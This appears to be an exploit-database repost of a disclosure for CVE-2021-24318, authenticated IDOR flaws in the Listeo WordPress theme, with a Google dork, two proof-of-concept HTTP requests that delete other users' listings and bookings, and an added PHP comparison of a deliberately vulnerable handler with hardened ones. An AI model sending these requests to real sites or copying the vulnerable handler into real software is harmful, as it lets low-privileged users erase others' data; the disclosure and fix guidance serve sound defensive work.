Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities

CVE: CVE-2021-24318
Category: CWE-639
Price: $5,000
Severity: Critical
Author: m0rph1t3
Risk: High
Exploitation Type: Authenticated Remote
Date: 2021-05-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050097 Below is a copy:
/*!
- # VULNERABILITY: Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities
- # GOOGLE DORK: inurl:/wp-content/themes/listeo/
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Purethemes [ https://purethemes.net ]
- # SOFTWARE VERSION: <= 1.6.10
- # SOFTWARE LINK: https://themeforest.net/item/listeo-directory-listings-wordpress-theme/23239259
- # CVSS: Multiple
- # CWE: CWE-639
- # CVE: CVE-2021-24318
*/
### -- [ Info: ]
[i] Multiple authenticated IDOR vulnerabilities were discovered in the Listeo theme through v1.6.10 for WordPress.
[i] Plugin(s) affected: Listeo Core by Purethemes [ https://purethemes.net ].
### -- [ Vulnerabilities: ]
[x] Authenticated IDOR | Post/page deletion: /my-properties/?action=delete&property_id=&_wpnonce= (PoC #1 below uses the /my-listings/ endpoint with the listing_id parameter).
[x] Authenticated IDOR | Booking deletion: action=listeo_bookings_manage&booking_id=&status=deleted.
### -- [ Impact: ]
[~] Any authenticated low-privileged user can delete listings/posts and bookings belonging to other users, up to the complete erasure of all such content on the targeted site.
### -- [ CVSS 3.1: ]
[%] Authenticated IDOR | Post/page deletion: AV:N/AC:L/PR:L/UI:R/S:U (partial vector as published; the C/I/A components were not given)
[%] Authenticated IDOR | Booking deletion: AV:N/AC:L/PR:L/UI:R/S:U (partial vector as published; the C/I/A components were not given)
### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]
[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100
[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]
### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]
[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]
action=listeo_bookings_manage&booking_id=13&status=deleted
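Both PoCs have the same root cause: the handler verifies that the caller is logged in (and, for PoC #1, that a nonce is valid) but never checks that the caller owns the object named by listing_id or booking_id. A WordPress nonce is a CSRF token, not an authorization decision, so it does not stop a user from substituting another user's id. The following is an added illustrative reconstruction written for this page; it is not Listeo Core's actual code. The function names, hook names, nonce actions, the 'listing' and 'listeo_booking' post types and the booking storage layout are assumptions chosen to match the PoC requests above.

```php
<?php
/*
 * Editor's illustrative example (not Listeo Core source). Shows the IDOR
 * pattern behind PoC #1 next to a hardened handler, and a hardened handler
 * for the admin-ajax booking action from PoC #2. All names are assumed.
 */

// Vulnerable pattern (hypothetical): login + nonce are the only gates.
// The nonce proves the link was generated for this user, not that the user
// owns listing_id, so any subscriber can delete any listing by changing the id.
function listeo_demo_vulnerable_delete_listing() {
    if ( ! is_user_logged_in() || ! isset( $_GET['action'], $_GET['listing_id'], $_GET['_wpnonce'] ) ) {
        return;
    }
    if ( $_GET['action'] === 'delete'
        && wp_verify_nonce( $_GET['_wpnonce'], 'listeo_my_listing_actions' ) ) {
        wp_delete_post( absint( $_GET['listing_id'] ), true ); // no ownership check
        wp_safe_redirect( remove_query_arg( array( 'action', 'listing_id', '_wpnonce' ) ) );
        exit;
    }
}

// Hardened pattern: bind the object to the requester before acting on it.
function listeo_demo_safe_delete_listing() {
    if ( ! is_user_logged_in() || ! isset( $_GET['action'], $_GET['listing_id'], $_GET['_wpnonce'] ) ) {
        return;
    }
    if ( $_GET['action'] !== 'delete' ) {
        return;
    }
    $listing_id = absint( $_GET['listing_id'] );

    // 1. Nonce scoped to the specific object, so a nonce minted for listing 12
    //    cannot be replayed against listing 13 (assumed nonce action name).
    if ( ! wp_verify_nonce( $_GET['_wpnonce'], 'listeo_delete_listing_' . $listing_id ) ) {
        wp_die( 'Invalid request.', '', array( 'response' => 403 ) );
    }

    // 2. Object must exist and be of the expected type.
    $listing = get_post( $listing_id );
    if ( ! $listing || $listing->post_type !== 'listing' ) {
        wp_die( 'Not found.', '', array( 'response' => 404 ) );
    }

    // 3. Ownership or an explicit capability. post_author is a string in WP,
    //    hence the cast. current_user_can('delete_post', $id) lets roles that
    //    WordPress already allows (administrators, editors) keep working.
    if ( (int) $listing->post_author !== get_current_user_id()
        && ! current_user_can( 'delete_post', $listing_id ) ) {
        wp_die( 'You do not own this listing.', '', array( 'response' => 403 ) );
    }

    wp_delete_post( $listing_id, true );
    wp_safe_redirect( remove_query_arg( array( 'action', 'listing_id', '_wpnonce' ) ) );
    exit;
}

// Hardened admin-ajax handler for PoC #2. Assumed storage: bookings are a
// 'listeo_booking' post type whose post_parent is the listing and whose
// post_author is the guest who booked. PoC #2 sends no nonce at all, so a
// CSRF token ('security' field) is added here as well.
function listeo_demo_safe_bookings_manage() {
    check_ajax_referer( 'listeo_bookings_manage', 'security' ); // CSRF only, still not authorization

    $booking_id = isset( $_POST['booking_id'] ) ? absint( $_POST['booking_id'] ) : 0;
    $status     = isset( $_POST['status'] ) ? sanitize_key( $_POST['status'] ) : '';
    $booking    = get_post( $booking_id );

    if ( ! $booking || $booking->post_type !== 'listeo_booking' ) {
        wp_send_json_error( 'not found', 404 );
    }

    // Both parties to a booking may legitimately manage it: the guest who
    // made it and the owner of the listing it belongs to. Anyone else is IDOR.
    $user_id       = get_current_user_id();
    $listing_owner = (int) get_post_field( 'post_author', $booking->post_parent );
    if ( $user_id !== (int) $booking->post_author && $user_id !== $listing_owner ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Whitelist the state transition instead of trusting an arbitrary string.
    if ( ! in_array( $status, array( 'approved', 'cancelled', 'deleted' ), true ) ) {
        wp_send_json_error( 'bad status', 400 );
    }

    if ( $status === 'deleted' ) {
        wp_delete_post( $booking_id, true );
    } else {
        update_post_meta( $booking_id, '_booking_status', $status );
    }
    wp_send_json_success();
}
add_action( 'wp_ajax_listeo_bookings_manage', 'listeo_demo_safe_bookings_manage' );
```

When testing a fix for this class of bug, log in as two separate low-privileged accounts, create a listing and a booking with each, and replay PoC #1 and PoC #2 from the other account: the hardened handlers should answer 403 and leave the objects in place, while the original handlers delete them.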
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
Copyright ©2024 Exploitalert.